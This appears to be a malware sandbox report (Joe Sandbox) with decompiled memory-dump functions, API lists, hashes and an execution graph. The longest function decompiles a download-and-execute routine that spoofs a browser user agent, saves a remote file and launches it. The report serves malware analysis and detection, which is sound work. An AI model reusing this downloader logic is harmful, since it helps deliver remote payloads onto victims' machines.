				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: ab4e0dad5a05e714c35a9c0c2cd98aee7fb4307c8e57754e49ac5a4dc3f293ea
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: ab4e0dad5a05e714c35a9c0c2cd98aee7fb4307c8e57754e49ac5a4dc3f293ea
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0286D4B9 Relevance: 1.3, APIs: 1, Instructions: 11sleepCOMMON
                        Download Yara Rule
                        C-Code - Quality: 37%
                        			E0286D4B9() {

				E0286D39F(); // executed
				 *0x289f8b4(0x28a0028);
				Sleep(0x64); // executed
				return  *0x289f8b8(0x28a0028);
			}



                        0x0286d4ba
                        0x0286d4c5
                        0x0286d4cd
                        0x0286d4db

                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 765f9c11144aaa194d1375639ffda62bc3508a1eddfb7d6fcf9b865517f40e4e
                        • Instruction ID: f5030965b8893455e88d41518f9415b8bf6f496fb8c695cc26985ab117f66885
                        • Opcode Fuzzy Hash: 765f9c11144aaa194d1375639ffda62bc3508a1eddfb7d6fcf9b865517f40e4e
                        • Instruction Fuzzy Hash: 65C04C3FD82924ABE2893B64790DACE3755DF6931371D0840F302E54C0DB6405674BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 028673CD Relevance: .3, Instructions: 289COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 54d00fea4448cc42d320c75b2a5d2e96c1e7650121fee7c727e9467fa818c0ee
                        • Instruction ID: f44afcc15e126b402a878c1726f30ab4447eb93aac78bbb6592f5c4fea646484
                        • Opcode Fuzzy Hash: 54d00fea4448cc42d320c75b2a5d2e96c1e7650121fee7c727e9467fa818c0ee
                        • Instruction Fuzzy Hash: BFB17C7CE4120CEFEB08CBA4D80DBBDBBB5EF58306F188855E606E6580D7749A60DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0286745E Relevance: .2, Instructions: 224COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c6cba7a69d2aa192c76fa297e91b9f150034e19ebb5f812881ae214746f9b301
                        • Instruction ID: 3d6c0c24acbf35907d8bfd5c031547c25f5c193fe5dc8421ce3c15f3bbfc21fb
                        • Opcode Fuzzy Hash: c6cba7a69d2aa192c76fa297e91b9f150034e19ebb5f812881ae214746f9b301
                        • Instruction Fuzzy Hash: B881707CE41208EFEB089BA0DC0DBBDBBB5EF98306F188855E606E65C4D7745A60DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:8.4%
                        Dynamic/Decrypted Code Coverage:2.7%
                        Signature Coverage:0%
                        Total number of Nodes:37
                        Total number of Limit Nodes:2
                        execution_graph 25422 3ae0f5a LdrInitializeThunk 25423 3a8489c 25426 3a848d5 25423->25426 25425 3a848c6 25427 3a848ec 25426->25427 25431 3a848f7 25427->25431 25432 3a661e9 25427->25432 25431->25425 25433 3a661f8 25432->25433 25440 3a66202 25433->25440 25435 3a66200 25435->25431 25436 3a84963 25435->25436 25438 3a8496d 25436->25438 25451 3a6e06b 25438->25451 25439 3a849ee 25439->25431 25441 3a6622b 25440->25441 25446 3a85150 25441->25446 25443 3a6625d 25444 3a85150 GetPEB 25443->25444 25445 3a6626c 25444->25445 25445->25435 25447 3a8515d 25446->25447 25448 3a85161 25446->25448 25447->25443 25449 3a851a9 GetPEB 25448->25449 25450 3a851c3 25448->25450 25449->25450 25450->25443 25452 3a6e099 25451->25452 25455 3a6db20 25452->25455 25454 3a6e0a9 25454->25439 25456 3a6db36 25455->25456 25459 3a6e6a4 25456->25459 25458 3a6db41 25458->25454 25460 3a6e6b8 25459->25460 25462 3a6e720 25460->25462 25463 3a651f6 25460->25463 25462->25458 25464 3a651fe 25463->25464 25466 3a6522e 25463->25466 25465 3a65215 GetPEB 25464->25465 25464->25466 25465->25466 25466->25462 25469 3a84004 URLDownloadToFileW 25470 3a84876 GetPEB GetPEB

                        Executed Functions

                        Function 03AE1CA8 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.573722683.0000000003AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 03AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3ae0000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction ID: 276e05382c44e754f64a631682c2cf0a86faafde1a6fa7e7aeff9baa436309a7
                        • Opcode Fuzzy Hash: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction Fuzzy Hash: 1BB0927008A2D14BC342A3204828AA77B542BA2211B69C0EAD0C02A14A86584625E3A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03AE1BA2 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.573722683.0000000003AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 03AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3ae0000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction ID: 6e447e2aab31238f52af9227f51ec9419e211fef2ea0690e6f86d454c0306d03
                        • Opcode Fuzzy Hash: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction Fuzzy Hash: 70B0927008A2825BC342672009388A2BB142BA231176DC0EAD0C00A14A8A584665F3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03AE1060 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.573722683.0000000003AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 03AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3ae0000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: b526b75a06f722ac38072758ac8086934243536fa66adb65538255f726036f97
                        • Instruction ID: 2508350d7d228aa9c09c903d05bde78944b93b85e539f99a1c54bdc4b1973750
                        • Opcode Fuzzy Hash: b526b75a06f722ac38072758ac8086934243536fa66adb65538255f726036f97
                        • Instruction Fuzzy Hash: 48B0927004A2825BC34163600829AA2AB142BA1210F6981AAD0C41A14A87584535D3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03AE1FBA Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.573722683.0000000003AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 03AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3ae0000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction ID: 88293d452c237b35b5d788c3fe7e5d6bf4017d7a5827ca68aa0277ca53bbf94f
                        • Opcode Fuzzy Hash: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction Fuzzy Hash: 04B0927008A2C24BC30157200C28AA77B542BA1312B6981AED0C00A55A87684561E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03AE0F5A Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.573722683.0000000003AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 03AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3ae0000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
                        • Instruction ID: 13d8455f11edab5e26112e1f76ce15454a3e06d171b0115a56dfd79d7043cd27
                        • Opcode Fuzzy Hash: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
                        • Instruction Fuzzy Hash: 75B0927008A2865BC34167200829AA36B552BA1210B6985AED0C00A14B87584675E7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03AE1996 Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.573722683.0000000003AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 03AE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3ae0000_zkqrKAufFycYKMdseGdhuYpyTVNu.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction ID: e6cd4b975672edc97eaad6a8d3891c608aeb046747e8cb31da1c1ec735a207a7
                        • Opcode Fuzzy Hash: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction Fuzzy Hash: C5B092B008A2C18FC34263204C2ACA37B242EA222136A81EAD0C40B15A865C4939E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 03A79BB4 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 649COMMON
                        Download Yara Rule
                        C-Code - Quality: 17%
                        			E03A79BB4(char _a4, intOrPtr _a8, signed int _a12, signed int _a16, intOrPtr* _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char _v60;
				signed int _v64;
				intOrPtr _v72;
				char _v80;
				short _v104;
				intOrPtr _v108;
				char _v152;
				char _v672;
				char _v928;
				char _v1448;
				char _v1968;
				void* __edi;
				void* __esi;
				intOrPtr _t237;
				signed int _t247;
				intOrPtr _t249;
				intOrPtr _t253;
				intOrPtr _t257;
				intOrPtr* _t259;
				intOrPtr* _t262;
				char _t280;
				signed int _t282;
				intOrPtr* _t287;
				signed int _t296;
				signed int _t309;
				intOrPtr* _t314;
				intOrPtr _t323;
				signed int _t328;
				intOrPtr* _t330;
				intOrPtr* _t334;
				intOrPtr* _t357;
				intOrPtr _t363;
				intOrPtr _t370;
				intOrPtr _t375;
				intOrPtr* _t378;
				intOrPtr* _t380;
				signed int _t383;
				signed int _t389;
				void* _t400;
				signed int _t401;
				intOrPtr _t402;
				void* _t403;
				intOrPtr* _t412;
				signed int _t420;
				void* _t421;
				intOrPtr _t422;
				signed int _t426;
				intOrPtr _t428;

				_t405 = _a4;
				_t412 = _a20;
				if(_a4 == 0 || E03A619D6(_t405) < 5) {
					if(_t412 != 0) {
						 *_t412 = 0xa;
					}
					goto L150;
				} else {
					_v16 = 0;
					_v12 = 0;
					_v24 = 0;
					_v28 = 0x84000200;
					_v44 = 0;
					_v40 = 0;
					_v56 = 0;
					_v32 = 0;
					_v20 = E03A6161B(0x802);
					_v60 = 0x100;
					_v36 = 0;
					E03A614DB(_t405,  &_v1448, 0, 0x208);
					E03A614DB(_t405,  &_v928, 0, 0x100);
					E03A614DB(_t405,  &_v672, 0, 0x208);
					if(( *0x3aa0620 & 0x00000001) != 0 && (_a12 & 0x00010000) != 0) {
						_a12 = _a12 & 0xfffeffff;
					}
					_t247 = _a12 & 0x00001000;
					_v52 = _t247;
					if(_t247 == 0 || (_a12 & 0x00000080) == 0) {
						_t249 = E03A79B0E(_t405,  &_v672);
					} else {
						_t389 =  *0x3a9f2e8; // 0x16d3fe8
						 *0x3a9f6a4( &_v672, _t389 + 0x1646, 0x103);
						 *0x3a9fc84( &_v672);
						 *0x3a9fc68( &_v672);
						_t405 =  &_v672;
						_t249 = E03A619E8( &_v672);
					}
					_v48 = _t249;
					if(_t249 == 0) {
						_v48 = E03A79B75( &_v672);
					}
					if(_v20 != 0) {
						if(_a16 != 0 || (_a12 & 0x00000002) == 0) {
							if((_a12 & 0x00000004) != 0) {
								_t383 = E03A6181B(_t405);
								_t405 = 0x3a98;
								 *0x3a9f90c(_t383 % 0x3a98 + 0x1388);
							}
							if(E03A64199(0x207, _t405,  &_v1448) < 5) {
								 *0x3a9f6a0( &_v1448, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)", 0x207);
							}
							_t253 =  *0x3aa0618; // 0x1
							if(_t253 != 1 && _t253 != 0) {
								_t253 = 0;
							}
							if((_a12 & 0x00010000) != 0) {
								_v28 = 0x84803200;
							}
							_t407 = _a12 & 0x00008000;
							_v64 = _t407;
							if(_t407 != 0) {
								_t420 = 0;
								goto L41;
							} else {
								_t428 =  *0x3a9fbd4( &_v1448, _t253, 0, 0, 0);
								_v16 = _t428;
								if(_t428 != 0) {
									_t370 =  *0x3a9fbdc(_t428, _a4, 0, 0, _v28, 0);
									_v12 = _t370;
									if(_t370 != 0) {
										_push(0);
										_push( &_v60);
										_t407 =  &_v928;
										_push( &_v928);
										_push(5);
										_push(_t370);
										if( *0x3a9fc08() != 1) {
											L36:
											_t420 = 0x800;
											_v44 = 0x800;
											L37:
											if((_a12 & 0x00000002) != 0 && _t420 != 0) {
												_t75 = _t420 + 2; // 0x802
												_v36 = E03A6161B(_t75);
											}
											L41:
											if(_v64 != 0) {
												_t400 = E03A6171C(_a8);
												_t421 = E03A6171C(_a4);
												_a4 = 1;
												if(_t400 == 0) {
													L108:
													_t257 = E03A8DC5C( &_v672);
													_v32 = _t257;
													if(_t257 == 0) {
														L102:
														if(_v12 != 0) {
															 *0x3a9fbb8(_v12);
														}
														if(_v16 != 0) {
															 *0x3a9fbb8(_v16);
														}
														E03A617E4(_v20);
														_t259 = _a20;
														if(_t259 != 0) {
															 *_t259 = 0xc;
														}
														L150:
														_t237 = 0;
														goto L151;
													}
													L109:
													_t401 = _a12;
													if((_t401 & 0x00000008) == 0) {
														L139:
														_t402 = _a24;
														if(_t402 != 0) {
															_t422 = _a28;
															if(_t422 != 0) {
																E03A614DB(_t407, _t402, 0, _t422 + _t422);
																 *0x3a9f6a4(_t402,  &_v672, _t422 - 1);
															}
														}
														if((_a12 & 0x00000001) != 0 && (_a12 & 0x00000100) != 0) {
															 *0x3a9f7a8(_t402, 0, 4);
														}
														_t262 = _a20;
														if(_t262 != 0) {
															 *_t262 = 0;
														}
														_t237 = _v32;
														goto L151;
													}
													_a4 = 0;
													E03A6518D( &_v152,  &_v80);
													_t407 =  !(_t401 >> 5) & 1;
													_v108 = 1;
													_v104 =  !(_t401 >> 5) & 1;
													if((_t401 & 0x00000200) == 0) {
														_t426 = _t401 & 0x00000400;
														_a16 = 0;
														if(_t426 == 0) {
															 *0x3a9f968( *0x3a9ec4a, 0);
														} else {
															 *0x3a9f968( *0x3a9ec4a, 0x4d2);
															_t407 =  *0x3a9f2e8; // 0x16d3fe8
															_t195 = _t407 + 0xa; // 0x22
															_t296 =  *_t195;
															if((_t296 & 0x00000040) == 0) {
																_a16 = 1;
																 *(_t407 + 0xa) = _t296 | 0x00000040;
															}
														}
														if((_t401 & 0x00002000) == 0) {
															if((_t401 & 0x00004000) == 0) {
																_push( &_v80);
																_push( &_v152);
																_push(0);
																_push(0);
																_push(0x28);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push( &_v672);
																if( *0x3a9f6ec() != 0) {
																	L129:
																	if(_t426 == 0 || _v72 == 0) {
																		L137:
																		E03A651CA( &_v80);
																		goto L138;
																	} else {
																		_t280 = E03A63207(_v72);
																		_a4 = _t280;
																		if(_t280 != 0) {
																			_t407 =  &_a4;
																			 *0x3a9f82c(0xffffffff, _t280, _v80,  &_a4, 0, 0, 3);
																		}
																		if(_a16 == 1) {
																			_t403 = 0x10;
																			do {
																				 *0x3a9f90c(0x3e8);
																				_t403 = _t403 - 1;
																			} while (_t403 != 0);
																			_t282 =  *0x3a9f2e8; // 0x16d3fe8
																			 *(_t282 + 0xa) =  *(_t282 + 0xa) & 0xffffffbf;
																		}
																		goto L137;
																	}
																}
																_push(0);
																_push(0);
																_push(0);
																_push( &_v672);
																_push(L"open");
																_push(0);
																if( *0x3a9fc50() <= 0x20) {
																	goto L118;
																}
																goto L129;
															}
															_push(0);
															_push(0);
															_push(0);
															_push( &_v672);
															_push(L"open");
															_push(0);
															if( *0x3a9fc50() > 0x20) {
																goto L138;
															}
															goto L118;
														} else {
															if(E03A83197( &_v672) != 0) {
																L138:
																 *0x3a9f968( *0x3a9ec4a, 0x4d2);
																goto L139;
															}
															L118:
															if(_v12 != 0) {
																 *0x3a9fbb8(_v12);
															}
															if(_v16 != 0) {
																 *0x3a9fbb8(_v16);
															}
															E03A617E4(_v20);
															_t287 = _a20;
															if(_t287 != 0) {
																 *_t287 = 8;
															}
															L96:
															if(_v24 == 0) {
																goto L150;
															}
															_push(_v24);
															L67:
															 *0x3a9f824();
															goto L150;
														}
													}
													E03A8816A( &_v672,  &_v152,  &_v80);
													goto L139;
												}
												if(_t421 != 0) {
													 *0x3a9fc70( &_v672, _t400);
													_a4 =  *0x3a9f540(0, _t421,  &_v672, 0, 0);
													E03A617E4(_t421);
												}
												E03A617E4(_t400);
												if(_a4 >= 0) {
													goto L108;
												} else {
													goto L102;
												}
											}
											_t309 = _a12 & 0x00000002;
											_v28 = _t309;
											if(_t309 != 0) {
												L69:
												do {
													E03A614DB(_t407, _v20, 0, 0x800);
													_v40 = 0;
													_v56 = 0;
													if(_v28 == 0) {
														L73:
														_push( &_v40);
														_push(0x800);
														_push(_v20);
														_push(_v12);
														if( *0x3a9fbe4() != 1) {
															L84:
															if(_v12 != 0) {
																 *0x3a9fbb8(_v12);
															}
															if(_v16 != 0) {
																 *0x3a9fbb8(_v16);
															}
															E03A617E4(_v20);
															_t314 = _a20;
															if(_t314 != 0) {
																 *_t314 = 7;
															}
															goto L96;
														}
														if(_v40 == 0) {
															break;
														}
														if(_v28 == 0 || _v36 == 0) {
															_push(0);
															_push( &_v56);
															_push(_v40);
															_push(_v20);
															_push(_v24);
															if( *0x3a9f788() == 0) {
																goto L84;
															}
														} else {
															E03A61493(_t407, _v36 + _v32, _v20, _v40);
														}
														goto L79;
													}
													_t121 = _t420 - 0x800; // -2048
													if(_v32 < _t121) {
														goto L73;
													}
													_t420 = _t420 + 0x2000;
													_t328 = E03A617B4(_v36, _t420);
													_v36 = _t328;
													if(_t328 == 0) {
														if(_v12 != 0) {
															 *0x3a9fbb8(_v12);
														}
														if(_v16 != 0) {
															 *0x3a9fbb8(_v16);
														}
														E03A617E4(_v20);
														_t330 = _a20;
														if(_t330 != 0) {
															 *_t330 = 0xb;
														}
														goto L96;
													}
													goto L73;
													L79:
													_t323 = _v40;
													_v32 = _v32 + _t323;
												} while (_t323 > 0);
												if(_v28 != 0) {
													L82:
													_t407 = _v36;
													 *_a16 = _v36;
													L83:
													if(_v32 != 0) {
														goto L109;
													}
													goto L84;
												}
												 *0x3a9f824(_v24);
												_v24 = 0;
												 *0x3a9fbb8(_v16);
												_v16 = 0;
												 *0x3a9fbb8(_v12);
												_v12 = 0;
												if(_v28 == 0) {
													goto L83;
												}
												goto L82;
											}
											if(_v48 == 0) {
												L45:
												if(_v12 != 0) {
													 *0x3a9fbb8(_v12);
												}
												if(_v16 != 0) {
													 *0x3a9fbb8(_v16);
												}
												E03A617E4(_v20);
												_t334 = _a20;
												if(_t334 != 0) {
													 *_t334 = 6;
												}
												goto L150;
											}
											_a4 = E03A6171C(_a8);
											E03A614DB(_t407,  &_v1968, 0, 0x208);
											if(_a4 != 0) {
												_push( &_v672);
												if( *0x3a9fc88() == 0) {
													 *0x3a9f758( &_v672, 0);
												}
												 *0x3a9fc68( &_v672);
												 *0x3a9f6a4( &_v1968,  &_v672, 0x103);
												 *0x3a9fc70( &_v672, _a4);
												if(_v52 != 0) {
													E03A8365B(_t420, 0);
												}
												_v24 =  *0x3a9f784( &_v672, 0x40000000, 0, 0, 2, 0x80, 0);
												if(_v52 != 0) {
													E03A834CF(0x40000000, 0);
												}
												if(_v24 != 0xffffffff) {
													L68:
													E03A617E4(_a4);
													_t420 = _v44;
													goto L69;
												} else {
													E03A614DB(_t407,  &_v672, 0, 0x208);
													if(E03A79B75( &_v672) == 0) {
														L60:
														if(_v12 != 0) {
															 *0x3a9fbb8(_v12);
														}
														if(_v16 != 0) {
															 *0x3a9fbb8(_v16);
														}
														E03A617E4(_v20);
														_t357 = _a20;
														if(_t357 != 0) {
															 *_t357 = 6;
														}
														_push(0xffffffff);
														goto L67;
													}
													 *0x3a9fc70( &_v672, _a4);
													_t363 =  *0x3a9f784( &_v672, 0x40000000, 0, 0, 2, 0x80, 0);
													_v24 = _t363;
													if(_t363 != 0xffffffff) {
														goto L68;
													}
													goto L60;
												}
											}
											goto L45;
										}
										_t375 =  *0x3a9f648( &_v928);
										_t420 = _t375;
										_pop(_t407);
										_v44 = _t375;
										if(_t420 == 0 || _t420 < 0x400) {
											goto L36;
										} else {
											goto L37;
										}
									}
									 *0x3a9fbb8(_t428);
									E03A617E4(_v20);
									_t378 = _a20;
									if(_t378 != 0) {
										 *_t378 = 5;
									}
									goto L150;
								}
								E03A617E4(_v20);
								_t380 = _a20;
								if(_t380 != 0) {
									 *_t380 = 4;
								}
								goto L150;
							}
						} else {
							E03A617E4(_v20);
							_push(0xa);
							goto L13;
						}
					} else {
						_push(0xb);
						L13:
						_pop(_t237);
						L151:
						return _t237;
					}
				}
			}































































                        0x03a79bb7
                        0x03a79bba
                        0x03a79bca
                        0x03a7a3ed
                        0x03a7a3ef
                        0x03a7a3ef
                        0x00000000
                        0x03a79bde
                        0x03a79be3
                        0x03a79be6
                        0x03a79be9
                        0x03a79bec
                        0x03a79bf3
                        0x03a79bf6
                        0x03a79bf9
                        0x03a79bfc
                        0x03a79c0a
                        0x03a79c1a
                        0x03a79c1d
                        0x03a79c20
                        0x03a79c2e
                        0x03a79c3c
                        0x03a79c48
                        0x03a79c53
                        0x03a79c53
                        0x03a79c5d
                        0x03a79c62
                        0x03a79c65
                        0x03a79cb8
                        0x03a79c6d
                        0x03a79c6d
                        0x03a79c84
                        0x03a79c91
                        0x03a79c9e
                        0x03a79ca4
                        0x03a79caa
                        0x03a79caa
                        0x03a79cbd
                        0x03a79cc2
                        0x03a79cd0
                        0x03a79cd0
                        0x03a79cd6
                        0x03a79ce3
                        0x03a79cfb
                        0x03a79cfd
                        0x03a79d04
                        0x03a79d12
                        0x03a79d12
                        0x03a79d2e
                        0x03a79d3d
                        0x03a79d3d
                        0x03a79d43
                        0x03a79d4b
                        0x03a79d51
                        0x03a79d51
                        0x03a79d5a
                        0x03a79d5c
                        0x03a79d5c
                        0x03a79d66
                        0x03a79d6c
                        0x03a79d6f
                        0x03a79e42
                        0x00000000
                        0x03a79d75
                        0x03a79d86
                        0x03a79d88
                        0x03a79d8d
                        0x03a79db7
                        0x03a79dbd
                        0x03a79dc2
                        0x03a79de9
                        0x03a79ded
                        0x03a79dee
                        0x03a79df4
                        0x03a79df5
                        0x03a79df7
                        0x03a79e01
                        0x03a79e22
                        0x03a79e22
                        0x03a79e27
                        0x03a79e2a
                        0x03a79e2e
                        0x03a79e34
                        0x03a79e3d
                        0x03a79e3d
                        0x03a79e44
                        0x03a79e47
                        0x03a7a144
                        0x03a7a14b
                        0x03a7a14d
                        0x03a7a156
                        0x03a7a1c9
                        0x03a7a1d0
                        0x03a7a1d5
                        0x03a7a1da
                        0x03a7a18f
                        0x03a7a192
                        0x03a7a197
                        0x03a7a197
                        0x03a7a1a0
                        0x03a7a1a5
                        0x03a7a1a5
                        0x03a7a1ae
                        0x03a7a1b3
                        0x03a7a1b8
                        0x03a7a1be
                        0x03a7a1be
                        0x03a7a3f5
                        0x03a7a3f5
                        0x00000000
                        0x03a7a3f5
                        0x03a7a1dc
                        0x03a7a1dc
                        0x03a7a1e2
                        0x03a7a39b
                        0x03a7a39b
                        0x03a7a3a0
                        0x03a7a3a2
                        0x03a7a3a7
                        0x03a7a3af
                        0x03a7a3be
                        0x03a7a3be
                        0x03a7a3a7
                        0x03a7a3c8
                        0x03a7a3d7
                        0x03a7a3d7
                        0x03a7a3dd
                        0x03a7a3e2
                        0x03a7a3e4
                        0x03a7a3e4
                        0x03a7a3e6
                        0x00000000
                        0x03a7a3e6
                        0x03a7a1f2
                        0x03a7a1f5
                        0x03a7a204
                        0x03a7a206
                        0x03a7a209
                        0x03a7a213
                        0x03a7a22f
                        0x03a7a235
                        0x03a7a238
                        0x03a7a26e
                        0x03a7a23a
                        0x03a7a245
                        0x03a7a24b
                        0x03a7a251
                        0x03a7a251
                        0x03a7a256
                        0x03a7a25b
                        0x03a7a262
                        0x03a7a262
                        0x03a7a256
                        0x03a7a27a
                        0x03a7a2d0
                        0x03a7a2f6
                        0x03a7a2fd
                        0x03a7a2fe
                        0x03a7a2ff
                        0x03a7a300
                        0x03a7a302
                        0x03a7a303
                        0x03a7a304
                        0x03a7a305
                        0x03a7a30c
                        0x03a7a315
                        0x03a7a336
                        0x03a7a338
                        0x03a7a382
                        0x03a7a385
                        0x00000000
                        0x03a7a33f
                        0x03a7a342
                        0x03a7a347
                        0x03a7a34c
                        0x03a7a352
                        0x03a7a35c
                        0x03a7a35c
                        0x03a7a366
                        0x03a7a36a
                        0x03a7a36b
                        0x03a7a370
                        0x03a7a376
                        0x03a7a376
                        0x03a7a379
                        0x03a7a37e
                        0x03a7a37e
                        0x00000000
                        0x03a7a366
                        0x03a7a338
                        0x03a7a317
                        0x03a7a318
                        0x03a7a319
                        0x03a7a320
                        0x03a7a321
                        0x03a7a326
